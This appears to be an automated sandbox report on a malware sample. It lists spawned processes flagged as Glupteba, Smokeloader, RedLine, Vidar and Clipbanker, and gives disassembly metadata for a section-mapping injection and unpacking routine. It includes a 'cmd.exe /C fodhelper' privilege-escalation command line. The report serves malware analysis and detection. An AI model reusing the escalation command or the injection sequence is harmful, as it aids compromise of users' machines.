                                                                                                                                                                                                                                      • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                      Start time:17:51:32
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4004 -s 10520
                                                                                                                                                                                                                                      Imagebase:0x7ff7f4a10000
                                                                                                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                      Start time:17:51:34
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                                                                                                                                                                                                      Imagebase:0x7ff663c20000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                      Start time:17:51:34
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:explorer.exe
                                                                                                                                                                                                                                      Imagebase:0x7ff609140000
                                                                                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                      Start time:17:51:34
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:283'648 bytes
                                                                                                                                                                                                                                      MD5 hash:8DAE8B6A6BE6E3527183594D1C26A2D3
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000023.00000002.3157028193.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 75%, ReversingLabs
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                      Start time:17:51:34
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                                                      Start time:17:51:34
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:fodhelper
                                                                                                                                                                                                                                      Imagebase:0x7ff71f280000
                                                                                                                                                                                                                                      File size:49'664 bytes
                                                                                                                                                                                                                                      MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                      Start time:17:51:35
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                                                                                                                                      Imagebase:0x7ff71f280000
                                                                                                                                                                                                                                      File size:49'664 bytes
                                                                                                                                                                                                                                      MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                                                      Start time:17:51:35
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:283'648 bytes
                                                                                                                                                                                                                                      MD5 hash:8DAE8B6A6BE6E3527183594D1C26A2D3
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                      Start time:17:51:36
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                                                                                                                                      Imagebase:0x7ff71f280000
                                                                                                                                                                                                                                      File size:49'664 bytes
                                                                                                                                                                                                                                      MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                                                                      Start time:17:51:37
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:306'688 bytes
                                                                                                                                                                                                                                      MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002B.00000002.3313063118.000000000083D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                      Start time:17:51:37
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\71C9.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\71C9.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:4'344'720 bytes
                                                                                                                                                                                                                                      MD5 hash:9857733C11948AC79AA5362444C01E94
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002C.00000002.4539281116.00000000030F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002C.00000002.4532684195.0000000002CF4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                                                                      Start time:17:51:38
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:powershell -nologo -noprofile
                                                                                                                                                                                                                                      Imagebase:0x6c0000
                                                                                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                                                                      Start time:17:51:38
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:6.3%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:53.7%
                                                                                                                                                                                                                                        Signature Coverage:40.7%
                                                                                                                                                                                                                                        Total number of Nodes:54
                                                                                                                                                                                                                                        Total number of Limit Nodes:5
                                                                                                                                                                                                                                        execution_graph 3581 403031 3582 402fbf 3581->3582 3584 40303a 3581->3584 3586 4019b2 3582->3586 3585 402fda 3587 4019c3 3586->3587 3588 4019fc Sleep 3587->3588 3589 401a17 3588->3589 3591 401a28 3589->3591 3592 4015d5 3589->3592 3591->3585 3593 4015e4 3592->3593 3594 401688 NtDuplicateObject 3593->3594 3603 4017a4 3593->3603 3595 4016a5 NtCreateSection 3594->3595 3594->3603 3596 401725 NtCreateSection 3595->3596 3597 4016cb NtMapViewOfSection 3595->3597 3598 401751 3596->3598 3596->3603 3597->3596 3599 4016ee NtMapViewOfSection 3597->3599 3601 40175b NtMapViewOfSection 3598->3601 3598->3603 3599->3596 3600 40170c 3599->3600 3600->3596 3602 401782 NtMapViewOfSection 3601->3602 3601->3603 3602->3603 3603->3591 3604 d2607a 3605 d2607f 3604->3605 3608 d260f0 3604->3608 3609 d26089 3605->3609 3610 d26098 3609->3610 3613 d26829 3610->3613 3619 d26844 3613->3619 3614 d2684d CreateToolhelp32Snapshot 3615 d26869 Module32First 3614->3615 3614->3619 3616 d26878 3615->3616 3617 d26088 3615->3617 3620 d264e8 3616->3620 3619->3614 3619->3615 3621 d26513 3620->3621 3622 d26524 VirtualAlloc 3621->3622 3623 d2655c 3621->3623 3622->3623 3624 402f3d 3625 402f4e 3624->3625 3626 4019b2 8 API calls 3625->3626 3627 402fda 3625->3627 3626->3627 3628 c2003c 3629 c20049 3628->3629 3641 c20e0f SetErrorMode SetErrorMode 3629->3641 3634 c20265 3635 c202ce VirtualProtect 3634->3635 3637 c2030b 3635->3637 3636 c20439 VirtualFree 3640 c204be LoadLibraryA 3636->3640 3637->3636 3639 c208c7 3640->3639 3642 c20223 3641->3642 3643 c20d90 3642->3643 3644 c20dad 3643->3644 3645 c20238 VirtualAlloc 3644->3645 3646 c20dbb GetPEB 3644->3646 3645->3634 3646->3645

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 229COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 85 40156b-401577 86 4015a3-4015a6 85->86 87 401579-40157e 85->87 90 4015a8-4015c7 86->90 91 4015fe-401632 call 40125c 86->91 88 401580-401599 87->88 89 40154a-401551 87->89 88->86 92 401553-401569 89->92 93 40151d-401546 call 40125c 89->93 90->91 103 401634 91->103 104 401637-40163c 91->104 92->85 93->89 103->104 106 401642-401653 104->106 107 401959-401961 104->107 110 401957 106->110 111 401659-401682 106->111 107->104 112 401966-4019af call 40125c 107->112 110->112 111->110 120 401688-40169f NtDuplicateObject 111->120 120->110 122 4016a5-4016c9 NtCreateSection 120->122 124 401725-40174b NtCreateSection 122->124 125 4016cb-4016ec NtMapViewOfSection 122->125 124->110 126 401751-401755 124->126 125->124 128 4016ee-40170a NtMapViewOfSection 125->128 126->110 130 40175b-40177c NtMapViewOfSection 126->130 128->124 129 40170c-401722 128->129 129->124 130->110 132 401782-40179e NtMapViewOfSection 130->132 132->110 135 4017a4 call 4017a9 132->135
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
                                                                                                                                                                                                                                        • Instruction ID: 4068bc8a221ecf0939acbdb1e7e88c7e46ae7771e33a0dc799c943c57428cfd7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC717CB4900205BFDB209F91CC48F9BBFB8FF96710F14416AFA52BA2E5D6749901CB64
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 206nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 138 4015d5-401605 143 401608-401632 call 40125c 138->143 144 4015fb-401601 138->144 150 401634 143->150 151 401637-40163c 143->151 144->143 150->151 153 401642-401653 151->153 154 401959-401961 151->154 157 401957 153->157 158 401659-401682 153->158 154->151 159 401966-4019af call 40125c 154->159 157->159 158->157 167 401688-40169f NtDuplicateObject 158->167 167->157 169 4016a5-4016c9 NtCreateSection 167->169 171 401725-40174b NtCreateSection 169->171 172 4016cb-4016ec NtMapViewOfSection 169->172 171->157 173 401751-401755 171->173 172->171 175 4016ee-40170a NtMapViewOfSection 172->175 173->157 177 40175b-40177c NtMapViewOfSection 173->177 175->171 176 40170c-401722 175->176 176->171 177->157 179 401782-40179e NtMapViewOfSection 177->179 179->157 182 4017a4 call 4017a9 179->182
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
                                                                                                                                                                                                                                        • Instruction ID: 31d3dea579921dc9a2cae9d470b126ee15754b3dfc7efa49c87a4de0449774b7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D615EB4900205FBEF209F95CC49FAF7BB8EF81700F14412AFA52BA1E4D6759901DB65
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00401603 Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 185 401603-401605 187 401608-401632 call 40125c 185->187 188 4015fb-401601 185->188 194 401634 187->194 195 401637-40163c 187->195 188->187 194->195 197 401642-401653 195->197 198 401959-401961 195->198 201 401957 197->201 202 401659-401682 197->202 198->195 203 401966-4019af call 40125c 198->203 201->203 202->201 211 401688-40169f NtDuplicateObject 202->211 211->201 213 4016a5-4016c9 NtCreateSection 211->213 215 401725-40174b NtCreateSection 213->215 216 4016cb-4016ec NtMapViewOfSection 213->216 215->201 217 401751-401755 215->217 216->215 219 4016ee-40170a NtMapViewOfSection 216->219 217->201 221 40175b-40177c NtMapViewOfSection 217->221 219->215 220 40170c-401722 219->220 220->215 221->201 223 401782-40179e NtMapViewOfSection 221->223 223->201 226 4017a4 call 4017a9 223->226
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1652636561-0
                                                                                                                                                                                                                                        • Opcode ID: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
                                                                                                                                                                                                                                        • Instruction ID: 0ca0715bd940020d1e7da968824c045868daa20d03b9e32912d168e5fb042320
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21513AB4900245BFEF209F91CC48FAB7BB8EF86700F144159FA11BA1A5D6759901CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015E0 Relevance: 10.7, APIs: 7, Instructions: 177nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 229 4015e0-401605 232 401608-401632 call 40125c 229->232 233 4015fb-401601 229->233 239 401634 232->239 240 401637-40163c 232->240 233->232 239->240 242 401642-401653 240->242 243 401959-401961 240->243 246 401957 242->246 247 401659-401682 242->247 243->240 248 401966-4019af call 40125c 243->248 246->248 247->246 256 401688-40169f NtDuplicateObject 247->256 256->246 258 4016a5-4016c9 NtCreateSection 256->258 260 401725-40174b NtCreateSection 258->260 261 4016cb-4016ec NtMapViewOfSection 258->261 260->246 262 401751-401755 260->262 261->260 264 4016ee-40170a NtMapViewOfSection 261->264 262->246 266 40175b-40177c NtMapViewOfSection 262->266 264->260 265 40170c-401722 264->265 265->260 266->246 268 401782-40179e NtMapViewOfSection 266->268 268->246 271 4017a4 call 4017a9 268->271
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2119751340.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6uVlPQSJ4e.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
                                                                                                                                                                                                                                        • Instruction ID: f8a4b5919756d8021f5b889f0f58571870373b5bf4bcbac62585d3645815d21d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D512AB4900245BFEF209F91CC48FAB7BB8EF85B00F14416AFA11BA1A5D6759945CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015F1 Relevance: 10.7, APIs: 7, Instructions: 177nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
